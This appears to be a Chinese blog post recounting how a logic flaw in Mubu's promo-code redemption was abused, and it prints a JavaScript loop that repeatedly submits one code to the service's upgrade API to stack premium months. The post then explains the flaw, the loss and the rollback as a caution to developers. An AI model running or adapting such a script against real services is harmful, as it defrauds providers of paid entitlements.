分享一个最近的薅羊毛事件:幕布高级会员无限领取

[软件开发] 季雨林 2020/7/20 8:33:57

前两天,有朋友给了个脚本,说是可以幕布高级会员无限续费。遂尝试了一下,果然,js脚本循环的去提交一个注册码,每次执行的结果是增加一个月VIP会员,把脚本扔在那里,不一会就刷到了好多年之后。代码脚本如下:

function mubu() {
	let formdata = new FormData();
	formdata.append('code', "9642-9716-0768-8881") fetch("https://mubu.com/api/upgrade/use_code", {
		method: "POST",
		body: formdata
	}).then((res) = >{
		console.log('续费成功')
	},
	err = >{
		console.log(err)
	}).
	catch(err = >{
		console.log(err)
	})
}
setInterval(mubu, 1000)


代码解释:很显然,这是一个程序设计缺点,用完的优惠码没有立刻失效,同时又遇上了利用程序脚本进行薅羊毛的情况。

造成损失很明显:用户利用这段脚本可以无限制的刷活动量,从而一个月加一个月的无限制叠加,获得近乎“永久”的高级会员权利。

处理后果也很明显:官方在具备某些数据可追溯的情况下,进行了数据回滚,从而取消了这种由于利用程序漏洞的行为。


现如今,涉及到权益兑换的程序逻辑越来越多 ,防止薅羊毛的需求越来越高,因为涉及到权益,因此稍微不慎,可能造成的就是经济损失



原文地址: https://www.opengps.cn/Blog/View.aspx?id=732 文章的更新编辑依此链接为准。欢迎关注源站原创文章!

评论

暂无评论!

发表评论:

用于接收作者回复信息
点击更换验证码 - openGPS提示

广告区


鲁ICP备14008001号-2